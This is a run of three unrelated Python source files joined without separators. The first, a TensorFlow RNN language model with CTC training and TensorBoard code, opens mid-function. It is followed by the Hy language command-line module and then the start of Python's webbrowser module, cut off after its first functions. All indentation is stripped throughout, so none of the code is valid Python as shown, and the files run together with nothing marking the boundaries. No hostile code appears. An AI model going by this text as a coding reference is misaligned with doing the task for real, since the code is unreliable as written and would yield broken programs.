cell = tf.contrib.rnn.DropoutWrapper(cell, input_keep_prob=input_keep_prob_ph,
output_keep_prob=output_keep_prob_ph)
layers_list.append(cell)
# Store the layers in a multi-layer RNN
cell = tf.contrib.rnn.MultiRNNCell(layers_list, state_is_tuple=True)
# Build the input layer between input and the RNN
with tf.variable_scope('Input_Layer'):
w_i = tf.get_variable("input_w", [self.input_dim, self.hidden_size], tf.float32,
initializer=tf.contrib.layers.xavier_initializer())
b_i = tf.get_variable("input_b", [self.hidden_size], tf.float32,
initializer=tf.constant_initializer(0.0))
# Apply the input layer to the network input to produce the input for the rnn part of the network
rnn_inputs = [tf.matmul(tf.squeeze(tf.cast(i, tf.float32), axis=[0]), w_i) + b_i
for i in tf.split(axis=0, num_or_size_splits=self.max_input_seq_length, value=inputs)]
# Switch from a list to a tensor
rnn_inputs = tf.stack(rnn_inputs)
# Define some variables to store the RNN state
# Note : tensorflow keeps the state inside a batch, but it's necessary to do this in order to keep the state
# between batches, especially when doing live transcription
# Another way would have been to get the state as an output of the session and feed it back every time, but
# this way is much more efficient
with tf.variable_scope('Hidden_state'):
state_variables = []
for state_c, state_h in cell.zero_state(self.batch_size, tf.float32):
state_variables.append(tf.nn.rnn_cell.LSTMStateTuple(
tf.Variable(state_c, trainable=False),
tf.Variable(state_h, trainable=False)))
# Return as a tuple, so that it can be fed to dynamic_rnn as an initial state
rnn_tuple_state = tuple(state_variables)
# Build the RNN
with tf.name_scope('LSTM'):
rnn_output, new_states = tf.nn.dynamic_rnn(cell, rnn_inputs, sequence_length=input_seq_lengths,
initial_state=rnn_tuple_state, time_major=True)
# Define an op to keep the hidden state between batches
update_ops = []
for state_variable, new_state in zip(rnn_tuple_state, new_states):
# Assign the new state to the state variables on this layer
update_ops.extend([state_variable[0].assign(new_state[0]),
state_variable[1].assign(new_state[1])])
# Return a tuple in order to combine all update_ops into a single operation.
# The tuple's actual value should not be used.
rnn_keep_state_op = tf.tuple(update_ops)
# Define an op to reset the hidden state to zeros
update_ops = []
for state_variable in rnn_tuple_state:
# Assign the new state to the state variables on this layer
update_ops.extend([state_variable[0].assign(tf.zeros_like(state_variable[0])),
state_variable[1].assign(tf.zeros_like(state_variable[1]))])
# Return a tuple in order to combine all update_ops into a single operation.
# The tuple's actual value should not be used.
rnn_state_zero_op = tf.tuple(update_ops)
# Build the output layer between the RNN and the char_map
with tf.variable_scope('Output_layer'):
w_o = tf.get_variable("output_w", [self.hidden_size, self.num_labels], tf.float32,
initializer=tf.contrib.layers.xavier_initializer())
b_o = tf.get_variable("output_b", [self.num_labels], tf.float32,
initializer=tf.constant_initializer(0.0))
# Compute the logits (each char probability for each timestep of the input, for each item of the batch)
logits = tf.stack([tf.matmul(tf.squeeze(i, axis=[0]), w_o) + b_o
for i in tf.split(axis=0, num_or_size_splits=self.max_input_seq_length, value=rnn_output)])
# Compute the prediction which is the best "path" of probabilities for each item of the batch
decoded, _log_prob = tf.nn.ctc_beam_search_decoder(logits, input_seq_lengths)
# Set the RNN result to the best path found
prediction = tf.to_int32(decoded[0])
return global_step, logits, prediction, rnn_keep_state_op, rnn_state_zero_op, \
input_keep_prob_ph, output_keep_prob_ph, rnn_tuple_state
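# Shape summary for _build_base_rnn (a reading aid derived from the code above):
#     inputs     : [max_input_seq_length, batch_size, input_dim]    (time major)
#     rnn_inputs : [max_input_seq_length, batch_size, hidden_size]  after the input layer
#     rnn_output : [max_input_seq_length, batch_size, hidden_size]  from dynamic_rnn
#     logits     : [max_input_seq_length, batch_size, num_labels]   after the output layer
#     prediction : sparse int32 tensor holding the best CTC beam-search path for each batch item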
def _add_training_on_rnn(self, logits, grad_clip, learning_rate, lr_decay_factor,
sparse_labels, input_seq_lengths, prediction):
"""
Build the training add-on of the Language RNN
This add-on offers ops that can be used to train the network:
* self.learning_rate_decay_op : will decay the learning rate
* self.acc_mean_loss_op : will compute the loss and accumulate it over multiple mini-batches
* self.acc_mean_loss_zero_op : will reset the loss accumulator to 0
* self.acc_error_rate_op : will compute the error rate and accumulate it over multiple mini-batches
* self.acc_error_rate_zero_op : will reset the error_rate accumulator to 0
* self.increase_mini_batch_op : will increase the mini-batches counter
* self.mini_batch_zero_op : will reset the mini-batches counter
* self.acc_gradients_zero_op : will reset the gradients
* self.accumulate_gradients_op : will compute the gradients and accumulate them over multiple mini-batches
* self.train_step_op : will clip the accumulated gradients and apply them to the RNN
Parameters
----------
:param logits: the output of the RNN before the beam search
:param grad_clip: max gradient size (prevent exploding gradients)
:param learning_rate: learning rate parameter fed to optimizer
:param lr_decay_factor: decay factor of the learning rate
:param sparse_labels: the labels in a sparse tensor
:param input_seq_lengths: vector containing the length of each input from 'inputs'
:param prediction: the predicted label given by the RNN
Returns
-------
:returns: tensorflow variable keeping the current learning rate
"""
# Define the variable for the learning rate
learning_rate_var = tf.Variable(float(learning_rate), trainable=False, name='learning_rate')
# Define an op to decrease the learning rate
self.learning_rate_decay_op = learning_rate_var.assign(tf.multiply(learning_rate_var, lr_decay_factor))
# Compute the CTC loss between the logits and the truth for each item of the batch
with tf.name_scope('CTC'):
ctc_loss = tf.nn.ctc_loss(sparse_labels, logits, input_seq_lengths, ignore_longer_outputs_than_inputs=True)
# Compute the mean loss of the batch (only used to check on progression in learning)
# The loss is averaged across the batch, but each item's loss is first divided by its real sequence length
mean_loss = tf.reduce_mean(tf.truediv(ctc_loss, tf.to_float(input_seq_lengths)))
# Set an accumulator to sum the loss between mini-batches
self.accumulated_mean_loss = tf.Variable(0.0, trainable=False)
self.acc_mean_loss_op = self.accumulated_mean_loss.assign_add(mean_loss)
self.acc_mean_loss_zero_op = self.accumulated_mean_loss.assign(tf.zeros_like(self.accumulated_mean_loss))
# Compute the error between the logits and the truth
with tf.name_scope('Error_Rate'):
error_rate = tf.reduce_mean(tf.edit_distance(prediction, sparse_labels, normalize=True))
# Set an accumulator to sum the error rate between mini-batches
self.accumulated_error_rate = tf.Variable(0.0, trainable=False)
self.acc_error_rate_op = self.accumulated_error_rate.assign_add(error_rate)
self.acc_error_rate_zero_op = self.accumulated_error_rate.assign(tf.zeros_like(self.accumulated_error_rate))
# Count mini-batches
with tf.name_scope('Mini_batch'):
# Set an accumulator to count the number of mini-batches in a batch
# Note : the variable is defined as float to avoid a type conversion error when using tf.divide
self.mini_batch = tf.Variable(0.0, trainable=False)
self.increase_mini_batch_op = self.mini_batch.assign_add(1)
self.mini_batch_zero_op = self.mini_batch.assign(tf.zeros_like(self.mini_batch))
# Compute the gradients
trainable_variables = tf.trainable_variables()
with tf.name_scope('Gradients'):
opt = tf.train.AdamOptimizer(learning_rate_var)
gradients = opt.compute_gradients(ctc_loss, trainable_variables)
# Define a list of variables to store the accumulated gradients between batches
accumulated_gradients = [tf.Variable(tf.zeros_like(tv.initialized_value()), trainable=False)
for tv in trainable_variables]
# Define an op to reset the accumulated gradient
self.acc_gradients_zero_op = [tv.assign(tf.zeros_like(tv)) for tv in accumulated_gradients]
# Define an op to accumulate the gradients calculated by the current batch with
# the accumulated gradients variable
self.accumulate_gradients_op = [accumulated_gradients[i].assign_add(gv[0])
for i, gv in enumerate(gradients)]
# Define an op to apply the result of the accumulated gradients
clipped_gradients, _norm = tf.clip_by_global_norm(accumulated_gradients, grad_clip)
self.train_step_op = opt.apply_gradients([(clipped_gradients[i], gv[1]) for i, gv in enumerate(gradients)],
global_step=self.global_step)
return learning_rate_var
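# Illustrative sketch (an assumption, not part of the original module): the accumulation ops
# defined above are meant to be driven in a start / run / end cycle, which run_train_step below
# wraps. The core pattern is roughly:
#
#     model.start_batch(sess, is_training=True)             # zero the loss/error/gradient accumulators
#     for _ in range(mini_batch_size):
#         model.run_step(sess, compute_gradients=True)       # accumulate gradients for one mini-batch
#     loss, err, step = model.end_batch(sess, is_training=True)   # clip and apply the summed gradients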
def add_tensorboard(self, session, tensorboard_dir, tb_run_name=None, timeline_enabled=False):
"""
Add the tensorboard operations to the RNN
This method will add ops to feed tensorboard
self.train_summaries_op : will produce the summary for a training step
self.test_summaries_op : will produce the summary for a test step
self.summary_writer_op : will write the summary to disk
Parameters
----------
:param session: the tensorflow session
:param tensorboard_dir: path to tensorboard directory
:param tb_run_name: directory name for the tensorboard files inside tensorboard_dir, if None a default dir
will be created
:param timeline_enabled: enable the output of a trace file for timeline visualization
"""
self.tensorboard_dir = tensorboard_dir
self.timeline_enabled = timeline_enabled
# Define GraphKeys for TensorBoard
graphkey_training = tf.GraphKeys()
graphkey_test = tf.GraphKeys()
# Learning rate
tf.summary.scalar('Learning_rate', self.learning_rate_var, collections=[graphkey_training, graphkey_test])
# Loss
with tf.name_scope('Mean_loss'):
mean_loss = tf.divide(self.accumulated_mean_loss, self.mini_batch)
tf.summary.scalar('Training', mean_loss, collections=[graphkey_training])
tf.summary.scalar('Test', mean_loss, collections=[graphkey_test])
# Accuracy
with tf.name_scope('Accuracy_-_Error_Rate'):
mean_error_rate = tf.divide(self.accumulated_error_rate, self.mini_batch)
tf.summary.scalar('Training', mean_error_rate, collections=[graphkey_training])
tf.summary.scalar('Test', mean_error_rate, collections=[graphkey_test])
# Hidden state
with tf.name_scope('RNN_internal_state'):
for idx, state_variable in enumerate(self.rnn_tuple_state):
tf.summary.histogram('Training_layer-{0}_cell_state'.format(idx), state_variable[0],
collections=[graphkey_training])
tf.summary.histogram('Test_layer-{0}_cell_state'.format(idx), state_variable[0],
collections=[graphkey_test])
tf.summary.histogram('Training_layer-{0}_hidden_state'.format(idx), state_variable[1],
collections=[graphkey_training])
tf.summary.histogram('Test_layer-{0}_hidden_state'.format(idx), state_variable[1],
collections=[graphkey_test])
self.train_summaries_op = tf.summary.merge_all(key=graphkey_training)
self.test_summaries_op = tf.summary.merge_all(key=graphkey_test)
if tb_run_name is None:
run_name = datetime.now().strftime('%Y-%m-%d--%H-%M-%S')
else:
run_name = tb_run_name
self.summary_writer_op = tf.summary.FileWriter(tensorboard_dir + '/' + run_name + '/', graph=session.graph)
def get_learning_rate(self):
return self.learning_rate_var.eval()
def set_learning_rate(self, sess, learning_rate):
assign_op = self.learning_rate_var.assign(learning_rate)
sess.run(assign_op)
def set_is_training(self, sess, is_training):
assign_op = self.is_training_var.assign(is_training)
sess.run(assign_op)
@staticmethod
def initialize(sess):
# Initialize variables
sess.run(tf.global_variables_initializer())
def save(self, session, checkpoint_dir):
# Save the model
checkpoint_path = os.path.join(checkpoint_dir, "languagemodel.ckpt")
self.saver_op.save(session, checkpoint_path, global_step=self.global_step)
logging.info("Checkpoint saved")
def restore(self, session, checkpoint_dir):
ckpt = tf.train.get_checkpoint_state(checkpoint_dir)
# Restore from checkpoint (will overwrite variables)
if ckpt:
self.saver_op.restore(session, ckpt.model_checkpoint_path)
logging.info("Restored model parameters from %s (global_step id %d)", ckpt.model_checkpoint_path,
self.global_step.eval())
else:
logging.info("Created model with fresh parameters.")
return
@staticmethod
def _add_saving_op():
"""
Define a tensorflow operation to save or restore the network
:return: a tensorflow tf.train.Saver operation
"""
# Define an op to save or restore the network
# Only save needed tensors:
# - weights and biases from the input layer and the output layer
# - weights and biases from the LSTM (which are named kernel and bias respectively)
# - current global_step and learning_rate
for var in tf.global_variables():
logging.debug("TF variable : %s - %s", var.name, var)
save_list = [var for var in tf.global_variables()
if (var.name.find('/input_w:0') != -1) or (var.name.find('/input_b:0') != -1) or
(var.name.find('/output_w:0') != -1) or (var.name.find('/output_b:0') != -1) or
(var.name.find('global_step:0') != -1) or (var.name.find('learning_rate:0') != -1) or
(var.name.find('/kernel:0') != -1) or (var.name.find('/bias:0') != -1)]
if len(save_list) == 0:
raise ValueError("Trying to define the saving operation before the RNN is built")
saver_op = tf.train.Saver(save_list)
return saver_op
def run_step(self, session, compute_gradients=True, run_options=None, run_metadata=None):
"""
Returns:
mean of ctc_loss
"""
# Base output is to accumulate loss and error_rate, increase the mini-batches counter and keep the hidden state
# for the next batch
output_feed = [self.acc_mean_loss_op, self.acc_error_rate_op,
self.increase_mini_batch_op, self.rnn_keep_state_op]
if compute_gradients:
# Add the update operation
output_feed.append(self.accumulate_gradients_op)
# and feed the dropout layer the keep probability values
input_feed = {self.input_keep_prob_ph: self.input_keep_prob,
self.output_keep_prob_ph: self.output_keep_prob}
else:
# No need to apply a dropout, set the keep probability to 1.0
input_feed = {self.input_keep_prob_ph: 1.0, self.output_keep_prob_ph: 1.0}
# Actually run the tensorflow session
start_time = time.time()
logging.debug("Starting a step")
session.run(output_feed, input_feed, options=run_options, run_metadata=run_metadata)
mini_batch_num = self.mini_batch.eval()
logging.debug("Step duration : %.2f", time.time() - start_time)
return mini_batch_num
def start_batch(self, session, is_training, run_options=None, run_metadata=None):
output = [self.acc_error_rate_zero_op, self.acc_mean_loss_zero_op, self.mini_batch_zero_op]
self.set_is_training(session, is_training)
if is_training:
output.append(self.acc_gradients_zero_op)
session.run(output, options=run_options, run_metadata=run_metadata)
return
def end_batch(self, session, is_training, run_options=None, run_metadata=None, rnn_state_reset_ratio=1.0):
# Get each accumulator's value and compute the mean for the batch
output_feed = [self.accumulated_mean_loss, self.accumulated_error_rate, self.mini_batch, self.global_step]
# If in training...
if is_training:
# Append the train_step_op (this will apply the gradients)
output_feed.append(self.train_step_op)
# Reset the hidden state at the given random ratio (default to always)
if randint(1, 1 // rnn_state_reset_ratio) == 1:
output_feed.append(self.rnn_state_zero_op)
# If a tensorboard dir is configured then run the merged_summaries operation
if self.tensorboard_dir is not None:
if is_training:
output_feed.append(self.train_summaries_op)
else:
output_feed.append(self.test_summaries_op)
outputs = session.run(output_feed, options=run_options, run_metadata=run_metadata)
accumulated_loss = outputs[0]
accumulated_error_rate = outputs[1]
batchs_count = outputs[2]
global_step = outputs[3]
if self.tensorboard_dir is not None:
summary = outputs[-1]
self.summary_writer_op.add_summary(summary, global_step)
mean_loss = accumulated_loss / batchs_count
mean_error_rate = accumulated_error_rate / batchs_count
return mean_loss, mean_error_rate, global_step
def process_input(self, session, inputs, input_seq_lengths, run_options=None, run_metadata=None):
"""
Returns:
Next char
"""
input_feed = {self.inputs_ph: np.array(inputs), self.input_seq_lengths_ph: np.array(input_seq_lengths)}
if (self.input_keep_prob_ph is not None) and (self.output_keep_prob_ph is not None):
input_feed[self.input_keep_prob_ph] = 1.0
input_feed[self.output_keep_prob_ph] = 1.0
output_feed = [self.prediction]
outputs = session.run(output_feed, input_feed, options=run_options, run_metadata=run_metadata)
predictions = session.run(tf.sparse_tensor_to_dense(outputs[0], default_value=self.num_labels,
validate_indices=True),
options=run_options, run_metadata=run_metadata)
return predictions
@staticmethod
def build_dataset(input_set, batch_size, max_input_seq_length, char_map):
# TODO : fix size calculation
length_set = [len(label) for label in input_set]
input_dataset = tf.data.Dataset.from_tensor_slices(input_set)
input_length_dataset = tf.data.Dataset.from_tensor_slices(length_set)
label_dataset = tf.data.Dataset.from_tensor_slices(input_set)
def _transcode_label(label):
# Need to convert back to string because tf.py_func changed it to a numpy array
label = str(label, encoding='UTF-8')
label_transcoded = dataprocessor.DataProcessor.get_str_to_one_hot_encoded(char_map, label)
return np.array(label_transcoded, dtype=np.int32)
def _transcode_and_offset_label(label):
# Need to convert back to string because tf.py_func changed it to a numpy array
label = str(label, encoding='UTF-8')
offseted_label = dataprocessor.DataProcessor.get_str_labels(char_map, label)
offseted_label = offseted_label[1:]
offseted_label.append(len(char_map) - 1)
logging.debug("Returning offseted label as : %s", offseted_label)
return np.array(offseted_label, dtype=np.int32)
input_dataset = input_dataset.map(lambda label: tf.py_func(_transcode_label, [label], tf.int32),
num_parallel_calls=2).prefetch(30)
label_dataset = label_dataset.map(lambda label: tf.py_func(_transcode_and_offset_label, [label], tf.int32),
num_parallel_calls=2).prefetch(30)
# Batch the datasets
input_dataset = input_dataset.padded_batch(batch_size, padded_shapes=[None, None])
label_dataset = label_dataset.apply(tf.contrib.data.dense_to_sparse_batch(batch_size=batch_size,
row_shape=[max_input_seq_length]))
input_length_dataset = input_length_dataset.batch(batch_size)
# And zip them together
dataset = tf.data.Dataset.zip((input_dataset, input_length_dataset, label_dataset))
# TODO : add a filter for files which are too long (currently de-structuring with Dataset.filter is not
# supported in python3)
return dataset
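# Illustrative sketch (an assumption, not part of the original module): build_dataset produces
# (inputs, lengths, sparse labels) batches that can be plugged into the model's iterator input:
#
#     dataset = LanguageModel.build_dataset(text_list, batch_size, max_input_seq_length, char_map)
#     iterator = model.add_dataset_input(dataset)
#     model.create_training_rnn(0.8, 0.5, grad_clip=5.0, learning_rate=3e-4,
#                               lr_decay_factor=0.99, use_iterator=True)
#     sess.run(iterator.initializer)    # iterators must be initialized before the first batch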
def add_dataset_input(self, dataset):
"""
Add one dataset as an input to the model
Parameters
----------
:param dataset: a tensorflow Dataset
:return iterator: tensorflow Iterator for the dataset
"""
iterator = dataset.make_initializable_iterator()
self.iterator_get_next_op = iterator.get_next()
return iterator
def add_datasets_input(self, train_dataset, valid_dataset):
"""
Add training and evaluation datasets for input to the model
Warning : returned iterators must be initialized before use : "tf.Session.run(iterator.initializer)" on each
Parameters
----------
:param train_dataset: a tensorflow Dataset
:param valid_dataset: a tensorflow Dataset
:return t_iterator: tensorflow Iterator for the train dataset
:return v_iterator: tensorflow Iterator for the valid dataset
"""
t_iterator = train_dataset.make_initializable_iterator()
v_iterator = valid_dataset.make_initializable_iterator()
self.iterator_get_next_op = tf.cond(self.is_training_var, lambda: t_iterator.get_next(),
lambda: v_iterator.get_next())
return t_iterator, v_iterator
def _write_timeline(self, run_metadata, inter_time, action=""):
logging.debug("--- Action %s duration : %.4f", action, time.time() - inter_time)
if self.tensorboard_dir is None:
logging.warning("Could not write timeline, a tensorboard_dir is required in config file")
return
# Create the Timeline object, and write it to a json
trace = timeline.Timeline(step_stats=run_metadata.step_stats)
logging.info('Writing to timeline-' + action + '.ctf.json')
with open(self.tensorboard_dir + '/' + 'timeline-' + action + '.ctf.json', 'w') as trace_file:
trace_file.write(trace.generate_chrome_trace_format())
return time.time()
def run_train_step(self, sess, mini_batch_size, rnn_state_reset_ratio, run_options=None, run_metadata=None):
"""
Run a single train step
Parameters
----------
:param sess: a tensorflow session
:param mini_batch_size: the number of mini-batches to run before applying the gradients
:param rnn_state_reset_ratio: the ratio at which the RNN internal state will be reset to 0
example: 1.0 means the RNN internal state will be reset at the end of each batch
example: 0.25 means there is a 25% chance that the RNN internal state will be reset at the end of each batch
:param run_options: options parameter for the sess.run calls
:param run_metadata: run_metadata parameter for the sess.run calls
:returns float mean_loss: mean loss for the train batch run
:returns float mean_error_rate: mean error rate for the train batch run
:returns int current_step: new value of the step counter at the end of this batch
:returns bool dataset_empty: `True` if the dataset was emptied during the batch
"""
start_time = inter_time = time.time()
dataset_empty = False
# Start a new batch
self.start_batch(sess, True, run_options=run_options, run_metadata=run_metadata)
if self.timeline_enabled:
inter_time = self._write_timeline(run_metadata, inter_time, "start_batch")
# Run multiple mini-batches inside the train step
mini_batch_num = 0
try:
for i in range(mini_batch_size):
# Run a step on a batch and keep the loss
mini_batch_num = self.run_step(sess, True, run_options=run_options, run_metadata=run_metadata)
if self.timeline_enabled:
inter_time = self._write_timeline(run_metadata, inter_time, "step-" + str(i))
except tf.errors.OutOfRangeError:
logging.debug("Dataset empty, exiting train step")
dataset_empty = True
# Close the batch if at least a mini-batch was completed
if mini_batch_num > 0:
mean_loss, mean_error_rate, current_step = self.end_batch(sess, True, run_options=run_options,
run_metadata=run_metadata,
rnn_state_reset_ratio=rnn_state_reset_ratio)
if self.timeline_enabled:
_ = self._write_timeline(run_metadata, inter_time, "end_batch")
# Step result
logging.info("Batch %d : loss %.5f - error_rate %.5f - duration %.2f",
current_step, mean_loss, mean_error_rate, time.time() - start_time)
return mean_loss, mean_error_rate, current_step, dataset_empty
else:
return 0.0, 0.0, self.global_step.eval(), dataset_empty
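# Illustrative outer training loop (comments only). `model` stands for an
# instance of the class above and `train_ds` for a tf.data.Dataset; both names
# are assumptions, not definitions made in this file:
#     iterator = model.add_dataset_input(train_ds)
#     with tf.Session() as sess:
#         sess.run(tf.global_variables_initializer())
#         sess.run(iterator.initializer)
#         dataset_empty = False
#         while not dataset_empty:
#             loss, error_rate, step, dataset_empty = model.run_train_step(
#                 sess, mini_batch_size=4, rnn_state_reset_ratio=1.0)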
|
|
# Copyright (c) 2013 Paul Tagliamonte <paultag@debian.org>
# Copyright (c) 2013 Gergely Nagy <algernon@madhouse-project.org>
# Copyright (c) 2013 James King <james@agentultra.com>
# Copyright (c) 2013 Julien Danjou <julien@danjou.info>
# Copyright (c) 2013 Konrad Hinsen <konrad.hinsen@fastmail.net>
# Copyright (c) 2013 Thom Neale <twneale@gmail.com>
# Copyright (c) 2013 Will Kahn-Greene <willg@bluesock.org>
# Copyright (c) 2013 Bob Tolbert <bob@tolbert.org>
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
# DEALINGS IN THE SOFTWARE.
from __future__ import print_function
import argparse
import code
import ast
import sys
import astor.codegen
import hy
from hy.lex import LexException, PrematureEndOfInput, tokenize
from hy.compiler import hy_compile, HyTypeError
from hy.importer import (ast_compile, import_buffer_to_module,
import_file_to_ast, import_file_to_hst)
from hy.completer import completion
from hy.macros import macro, require
from hy.models.expression import HyExpression
from hy.models.string import HyString
from hy.models.symbol import HySymbol
from hy._compat import builtins, PY3
class HyQuitter(object):
def __init__(self, name):
self.name = name
def __repr__(self):
return "Use (%s) or Ctrl-D (i.e. EOF) to exit" % (self.name)
__str__ = __repr__
def __call__(self, code=None):
try:
sys.stdin.close()
except:
pass
raise SystemExit(code)
builtins.quit = HyQuitter('quit')
builtins.exit = HyQuitter('exit')
def print_python_code(_ast):
# astor cannot handle ast.Interactive, so disguise it as a module
_ast_for_print = ast.Module()
_ast_for_print.body = _ast.body
print(astor.codegen.to_source(_ast_for_print))
class HyREPL(code.InteractiveConsole):
def __init__(self, spy=False, locals=None, filename="<input>"):
self.spy = spy
code.InteractiveConsole.__init__(self, locals=locals,
filename=filename)
def runsource(self, source, filename='<input>', symbol='single'):
global SIMPLE_TRACEBACKS
try:
tokens = tokenize(source)
except PrematureEndOfInput:
return True
except LexException as e:
if e.source is None:
e.source = source
e.filename = filename
sys.stderr.write(str(e))
return False
try:
_ast = hy_compile(tokens, "__console__", root=ast.Interactive)
if self.spy:
print_python_code(_ast)
code = ast_compile(_ast, filename, symbol)
except HyTypeError as e:
if e.source is None:
e.source = source
e.filename = filename
if SIMPLE_TRACEBACKS:
sys.stderr.write(str(e))
else:
self.showtraceback()
return False
except Exception:
self.showtraceback()
return False
self.runcode(code)
return False
@macro("koan")
def koan_macro():
return HyExpression([HySymbol('print'),
HyString("""
Ummon asked the head monk, "What sutra are you lecturing on?"
"The Nirvana Sutra."
"The Nirvana Sutra has the Four Virtues, hasn't it?"
"It has."
Ummon asked, picking up a cup, "How many virtues has this?"
"None at all, " said the monk.
"But ancient people said it had, didn't they?" said Ummon.
"Whatdo you think of what they said?"
Ummon struck the cup and asked, "You understand?"
"No," said the monk.
"Then," said Ummon, "You'd better go on with your lectures on the sutra."
""")])
@macro("ideas")
def ideas_macro():
return HyExpression([HySymbol('print'),
HyString("""
=> (import [sh [figlet]])
=> (figlet "Hi, Hy!")
_ _ _ _ _ _
| | | (_) | | | |_ _| |
| |_| | | | |_| | | | | |
| _ | |_ | _ | |_| |_|
|_| |_|_( ) |_| |_|\__, (_)
|/ |___/
;;; string things
(.join ", " ["what" "the" "heck"])
;;; this one plays with command line bits
(import [sh [cat grep]])
(-> (cat "/usr/share/dict/words") (grep "-E" "bro$"))
;;; filtering a list w/ a lambda
(filter (lambda [x] (= (% x 2) 0)) (range 0 10))
;;; swaggin' functional bits (Python rulez)
(max (map (lambda [x] (len x)) ["hi" "my" "name" "is" "paul"]))
""")])
require("hy.cmdline", "__console__")
require("hy.cmdline", "__main__")
SIMPLE_TRACEBACKS = True
def run_command(source):
try:
import_buffer_to_module("__main__", source)
except (HyTypeError, LexException) as e:
if SIMPLE_TRACEBACKS:
sys.stderr.write(str(e))
return 1
raise
except Exception:
raise
return 0
def run_file(filename):
from hy.importer import import_file_to_module
try:
import_file_to_module("__main__", filename)
except (HyTypeError, LexException) as e:
if SIMPLE_TRACEBACKS:
sys.stderr.write(str(e))
return 1
raise
except Exception:
raise
return 0
def run_repl(hr=None, spy=False):
import platform
sys.ps1 = "=> "
sys.ps2 = "... "
with completion():
if not hr:
hr = HyREPL(spy)
hr.interact("{appname} {version} using "
"{py}({build}) {pyversion} on {os}".format(
appname=hy.__appname__,
version=hy.__version__,
py=platform.python_implementation(),
build=platform.python_build()[0],
pyversion=platform.python_version(),
os=platform.system()
))
return 0
def run_icommand(source, spy=False):
hr = HyREPL(spy)
hr.runsource(source, filename='<input>', symbol='single')
return run_repl(hr)
USAGE = "%(prog)s [-h | -i cmd | -c cmd | file | -] [arg] ..."
VERSION = "%(prog)s " + hy.__version__
EPILOG = """ file program read from script
- program read from stdin
[arg] ... arguments passed to program in sys.argv[1:]
"""
def cmdline_handler(scriptname, argv):
parser = argparse.ArgumentParser(
prog="hy",
usage=USAGE,
formatter_class=argparse.RawDescriptionHelpFormatter,
epilog=EPILOG)
parser.add_argument("-c", dest="command",
help="program passed in as a string")
parser.add_argument(
"-i", dest="icommand",
help="program passed in as a string, then stay in REPL")
parser.add_argument("--spy", action="store_true",
help="print equivalent Python code before executing")
parser.add_argument("-v", action="version", version=VERSION)
parser.add_argument("--show-tracebacks", action="store_true",
help="show complete tracebacks for Hy exceptions")
# this will contain the script/program name and any arguments for it.
parser.add_argument('args', nargs=argparse.REMAINDER,
help=argparse.SUPPRESS)
# stash the hy executable in case we need it later
# mimics Python sys.executable
hy.executable = argv[0]
options = parser.parse_args(argv[1:])
if options.show_tracebacks:
global SIMPLE_TRACEBACKS
SIMPLE_TRACEBACKS = False
# reset sys.argv like Python
sys.argv = options.args or [""]
if options.command:
# User did "hy -c ..."
return run_command(options.command)
if options.icommand:
# User did "hy -i ..."
return run_icommand(options.icommand, spy=options.spy)
if options.args:
if options.args[0] == "-":
# Read the program from stdin
return run_command(sys.stdin.read())
else:
# User did "hy <filename>"
try:
return run_file(options.args[0])
except IOError as x:
sys.stderr.write("hy: Can't open file '%s': [Errno %d] %s\n" %
(x.filename, x.errno, x.strerror))
sys.exit(x.errno)
# User did NOTHING!
return run_repl(spy=options.spy)
# entry point for cmd line script "hy"
def hy_main():
sys.exit(cmdline_handler("hy", sys.argv))
# entry point for cmd line script "hyc"
def hyc_main():
from hy.importer import write_hy_as_pyc
parser = argparse.ArgumentParser(prog="hyc")
parser.add_argument("files", metavar="FILE", nargs='+',
help="file to compile")
parser.add_argument("-v", action="version", version=VERSION)
options = parser.parse_args(sys.argv[1:])
for file in options.files:
try:
write_hy_as_pyc(file)
print("Compiling %s" % file)
except IOError as x:
sys.stderr.write("hyc: Can't open file '%s': [Errno %d] %s\n" %
(x.filename, x.errno, x.strerror))
sys.exit(x.errno)
# entry point for cmd line script "hy2py"
def hy2py_main():
import platform
module_name = "<STDIN>"
options = dict(prog="hy2py", usage="%(prog)s [options] FILE",
formatter_class=argparse.RawDescriptionHelpFormatter)
parser = argparse.ArgumentParser(**options)
parser.add_argument("--with-source", "-s", action="store_true",
help="Show the parsed source structure")
parser.add_argument("--with-ast", "-a", action="store_true",
help="Show the generated AST")
parser.add_argument("--without-python", "-np", action="store_true",
help=("Do not show the Python code generated "
"from the AST"))
parser.add_argument('args', nargs=argparse.REMAINDER,
help=argparse.SUPPRESS)
options = parser.parse_args(sys.argv[1:])
if not options.args:
parser.exit(1, parser.format_help())
if options.with_source:
hst = import_file_to_hst(options.args[0])
# need special printing on Windows in case the
# codepage doesn't support utf-8 characters
if PY3 and platform.system() == "Windows":
for h in hst:
try:
print(h)
except:
print(str(h).encode('utf-8'))
else:
print(hst)
print()
print()
_ast = import_file_to_ast(options.args[0], module_name)
if options.with_ast:
if PY3 and platform.system() == "Windows":
_print_for_windows(astor.dump(_ast))
else:
print(astor.dump(_ast))
print()
print()
if not options.without_python:
if PY3 and platform.system() == "Windows":
_print_for_windows(astor.codegen.to_source(_ast))
else:
print(astor.codegen.to_source(_ast))
parser.exit(0)
# need special printing on Windows in case the
# codepage doesn't support utf-8 characters
def _print_for_windows(src):
for line in src.split("\n"):
try:
print(line)
except:
print(line.encode('utf-8'))
|
|
#!/usr/pkg/bin/python2.7
"""Interfaces for launching and remotely controlling Web browsers."""
# Maintained by Georg Brandl.
import os
import shlex
import sys
import stat
import subprocess
import time
__all__ = ["Error", "open", "open_new", "open_new_tab", "get", "register"]
class Error(Exception):
pass
_browsers = {} # Dictionary of available browser controllers
_tryorder = [] # Preference order of available browsers
def register(name, klass, instance=None, update_tryorder=1):
"""Register a browser connector and, optionally, connection."""
_browsers[name.lower()] = [klass, instance]
if update_tryorder > 0:
_tryorder.append(name)
elif update_tryorder < 0:
_tryorder.insert(0, name)
def get(using=None):
